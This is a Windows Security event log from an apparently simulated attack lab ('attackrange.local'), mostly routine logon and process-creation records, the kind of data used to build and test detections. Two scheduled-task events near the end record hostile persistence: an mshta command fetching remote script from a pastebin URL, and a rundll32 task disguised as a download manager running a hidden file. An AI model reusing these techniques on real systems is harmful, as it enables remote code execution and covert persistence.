Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:54:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265066
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x178c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:54:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265065
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AF466
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:54:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265064
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AF56B
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:54:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265063
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AF648
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:54:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265062
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8AFAC9
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 64933
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:54:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265061
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AFAC9
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:54:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265060
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8AF648
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 64930
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:54:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265059
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AF648
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:54:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265058
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8AF56B
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:54:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265057
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AF56B
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:54:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265056
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8AF466
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 64929
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:54:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265055
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AF466
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:54:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265054
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8AF444
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 64928
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:54:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265053
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AF444
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:54:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265052
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1958
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:54:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265067
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1424
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:54:11 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4699
EventType=0
Type=Information
ComputerName=win-host-797.attackrange.local
TaskCategory=Other Object Access Events
OpCode=Info
RecordNumber=255436
Keywords=Audit Success
Message=A scheduled task was deleted.
Subject:
Security ID: WIN-HOST-797\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-797
Logon ID: 0xF1C42
Task Information:
Task Name: \Pornhub
Task Content:
04/19/2021 03:54:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265068
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a18
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:54:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265070
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1208
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:54:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265069
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a84
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:54:16 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4699
EventType=0
Type=Information
ComputerName=win-host-797.attackrange.local
TaskCategory=Other Object Access Events
OpCode=Info
RecordNumber=255437
Keywords=Audit Success
Message=A scheduled task was deleted.
Subject:
Security ID: WIN-HOST-797\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-797
Logon ID: 0xF1C42
Task Information:
Task Name: \Windows Free Internet Download Manager
Task Content:
04/19/2021 03:54:19 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265071
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AFAC9
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:54:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265074
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8B2966
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:54:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265073
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8B2966
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 64945
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:54:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265072
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8B2966
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:54:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4698
EventType=0
Type=Information
ComputerName=win-host-797.attackrange.local
TaskCategory=Other Object Access Events
OpCode=Info
RecordNumber=255438
Keywords=Audit Success
Message=A scheduled task was created.
Subject:
Security ID: WIN-HOST-797\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-797
Logon ID: 0xF1C42
Task Information:
Task Name: \Pornhub
Task Content:
2021-04-19T15:54:56
WIN-HOST-797\Administrator
\Pornhub
PT80M
false
2021-04-19T15:54:00
true
IgnoreNew
true
true
true
false
false
PT10M
PT1H
true
false
true
true
false
false
false
PT72H
7
"mshta"
http:\\pastebin.com\raw\tuhQ7gWV
WIN-HOST-797\Administrator
InteractiveToken
LeastPrivilege
04/19/2021 03:55:03 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4698
EventType=0
Type=Information
ComputerName=win-host-797.attackrange.local
TaskCategory=Other Object Access Events
OpCode=Info
RecordNumber=255439
Keywords=Audit Success
Message=A scheduled task was created.
Subject:
Security ID: WIN-HOST-797\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-797
Logon ID: 0xF1C42
Task Information:
Task Name: \Windows Free Internet Download Manager
Task Content:
1.1.1
Tenucy
WInternet Free Download Manager gives you the tools to download many types of files from the Internet and organize them as you see fit
\Windows Free Internet Download Manager
true
HighestAvailable
SYSTEM
InteractiveToken
IgnoreNew
false
true
true
true
false
true
false
true
true
false
false
false
PT0S
6
C:\Windows\system32\rundll32.exe
"C:\Users\Administrator\AppData\Roaming\NetDownloadManager_2756960808\hx1jn.dwn",StartW
04/19/2021 03:55:04 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265075
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-DC-209$
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8A686A
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:55:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
